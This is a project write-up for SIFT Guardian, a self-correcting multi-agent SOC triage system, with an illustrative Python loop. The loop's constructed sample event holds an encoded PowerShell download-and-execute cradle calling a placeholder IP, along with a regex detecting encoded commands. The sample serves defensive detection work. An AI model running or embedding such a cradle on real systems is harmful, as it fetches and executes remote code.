Inspiration

Alert fatigue is one of the most critical issues facing modern Security Operations Centers (SOCs). Analysts are bombarded by alerts, many of them false positives, while genuine threats stay hidden because the forensic context needed to recognise them is missing from the initial alert. We wanted to build a system that works like a real SecOps team: specialised agents that not only analyse logs but also critique each other's work and automatically query the log database for the missing context, just as a human investigator would.

What it does

SIFT Guardian is an autonomous SecOps incident response system. When a telemetry payload (like an encoded PowerShell script, a malicious Word document spawning child processes, or a web shell injection) is submitted:

  1. The Investigator Agent performs the initial threat signature analysis.
  2. The Skeptic Agent audits the findings. If confidence is low or required telemetry categories (such as Parent Process, Persistence, or Network Activity) are missing, it triggers a self-correction loop.
  3. The Investigator automatically reanalyses the case, querying the enterprise log database for the missing evidence classes.
  4. The Verifier Agent validates each finding against the underlying telemetry sources before approving it.
  5. The Reporter Agent compiles the approved findings into a peer-reviewed Markdown intelligence advisory.

How we built it

  • Backend: Built in C# on the .NET 10.0 SDK. Each agent persona is registered as a transient or singleton service through dependency injection, keeping the agents decoupled from one another, and a central AgentOrchestrator workflow manager drives the Investigator/Skeptic/Verifier/Reporter sequence.
  • Frontend: Built with vanilla HTML5, CSS3, and JavaScript (ES6). It features a glowing cyberpunk grid command-center theme with a real-time topology flow graph showing active agent states and self-correction cycles, plus a custom log terminal.

Challenges we ran into

The hard part was orchestrating agent collaboration dynamically without the Investigator and Skeptic trapping each other in an infinite loop. We solved this with structured context state maps: the Skeptic's feedback is not free text but a concrete list of missing evidence classes, and that list is passed as the target parameters to the Investigator's reanalysis handler, so every cycle has a specific gap to fill rather than repeating the same analysis.
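
The four-agent pipeline described under "What it does" and the loop-termination problem above, as an added worked example that is not SIFT Guardian's code: the project itself is written in C#, but this stand-alone Python sketch shows the same control flow so it can be run anywhere. Everything in it is assumed for illustration, including the event shape, the in-memory LOG_STORE standing in for the enterprise log database, the three category names, the confidence threshold, and the iteration cap. Beyond the state map that carries the Skeptic's missing-evidence list back into reanalysis, it adds the two guards a practitioner would want: a hard iteration cap, and a stop when the query for the missing classes returns nothing new, since feedback that can never be satisfied would otherwise come back unchanged every cycle.

```python
"""Bounded Investigator -> Skeptic -> (reanalysis) -> Verifier -> Reporter loop.

Illustrative Python written for this write-up; SIFT Guardian itself is C#/.NET and
this is not its code. The event shape, log store, category names, threshold and
iteration cap are all assumptions chosen for the example.
"""
import base64
import re

# Evidence classes the Skeptic requires before sign-off (assumed; the write-up names these three).
REQUIRED_CATEGORIES = ("ParentProcess", "Persistence", "NetworkActivity")
CONFIDENCE_THRESHOLD = 0.8   # assumed value
MAX_ITERATIONS = 3           # hard cap so Investigator/Skeptic cannot loop forever

# Constructed stand-in for the enterprise log database, keyed by (host, category).
# Persistence is deliberately absent for ws-042: the loop must still terminate when
# the evidence it asks for never arrives.
LOG_STORE = {
    ("ws-042", "ParentProcess"): ["WINWORD.EXE (pid 4120) -> powershell.exe (pid 4188)"],
    ("ws-042", "NetworkActivity"): ["powershell.exe -> 203.0.113.10:443 TLS"],
}

# Constructed telemetry payload: Word spawning encoded PowerShell (-Enc takes UTF-16LE base64).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')".encode("utf-16-le")
).decode()
SAMPLE_EVENT = {"host": "ws-042", "command_line": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"}

ENC_RE = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.I)


def query_logs(host, categories):
    """Fetch only the evidence classes the Skeptic flagged, mirroring a targeted SIEM query."""
    return {c: LOG_STORE.get((host, c), []) for c in categories}


def investigate(event, context):
    """Investigator: decode the command line, then fold in whatever context has been gathered."""
    findings, confidence = [], 0.0
    m = ENC_RE.search(event["command_line"])
    if m:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
        findings.append(f"Encoded PowerShell decodes to: {decoded}")
        confidence = 0.5
    for category, rows in context.items():
        for row in rows:
            findings.append(f"{category}: {row}")
            confidence = min(1.0, confidence + 0.2)
    # Only categories that actually returned rows count as covered evidence.
    return {"findings": findings, "confidence": confidence,
            "sources": {c for c, rows in context.items() if rows}}


def skeptic(analysis):
    """Skeptic: the missing evidence classes are the feedback parameters handed back for reanalysis."""
    missing = [c for c in REQUIRED_CATEGORIES if c not in analysis["sources"]]
    if analysis["confidence"] < CONFIDENCE_THRESHOLD and not missing:
        return list(REQUIRED_CATEGORIES)  # low confidence with nothing obviously missing: re-pull everything
    return missing


def verify(analysis, event, context):
    """Verifier: approve only findings that trace to the raw event or to a fetched log row."""
    approved = []
    for finding in analysis["findings"]:
        category, _, body = finding.partition(": ")
        if body in context.get(category, []):
            approved.append(finding)
        elif finding.startswith("Encoded PowerShell") and ENC_RE.search(event["command_line"]):
            approved.append(finding)
    return approved


def report(event, approved, iterations, unresolved):
    """Reporter: Markdown advisory listing only peer-approved findings and any evidence still missing."""
    lines = [f"# Advisory for {event['host']}", "", f"Self-correction cycles: {iterations}", ""]
    lines += [f"- {f}" for f in approved] or ["- No findings approved"]
    if unresolved:
        lines += ["", "Unresolved evidence classes: " + ", ".join(unresolved)]
    return "\n".join(lines)


def run_pipeline(event):
    """Orchestrator: the state map carries Skeptic feedback into reanalysis; two guards stop infinite loops."""
    context, iterations = {}, 0
    analysis = investigate(event, context)
    while iterations < MAX_ITERATIONS:                 # guard 1: hard iteration cap
        missing = skeptic(analysis)
        if not missing:
            break
        fetched = query_logs(event["host"], missing)
        if not any(fetched.values()):                  # guard 2: nothing new, so feedback would repeat forever
            break
        context.update(fetched)
        iterations += 1
        analysis = investigate(event, context)
    approved = verify(analysis, event, context)
    unresolved = [c for c in REQUIRED_CATEGORIES if not context.get(c)]
    return {"approved": approved, "confidence": analysis["confidence"], "iterations": iterations,
            "unresolved": unresolved, "report": report(event, approved, iterations, unresolved)}


if __name__ == "__main__":
    print(run_pipeline(SAMPLE_EVENT)["report"])
```

Run as a script it prints the Markdown advisory for the constructed event. Because Persistence rows never exist for that host, the run stops after one self-correction cycle and the advisory lists Persistence as unresolved instead of quietly approving a report with a gap in it; a benign event on an unknown host exits with zero cycles and no approved findings.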

Accomplishments that we're proud of

  • Designing a polished, responsive dashboard that gives immediate visual feedback on the multi-agent collaboration.
  • Implementing a fully functional self-correcting loop that gathers additional forensic evidence on the fly, in the middle of an investigation.

What we learned

We learned how to design contrasting agent personalities (an optimistic Investigator versus an adversarial Skeptic) so that their disagreement acts as rigorous output validation and drives down the false positive rate.

What's next for SIFT Guardian: Self-Correcting SecOps Agents

  • Integrating real-time SIEM connectors (Splunk/Elasticsearch).
  • Enabling automated containment tasks (e.g. blocking IPs, isolating endpoints, or revoking OAuth tokens).
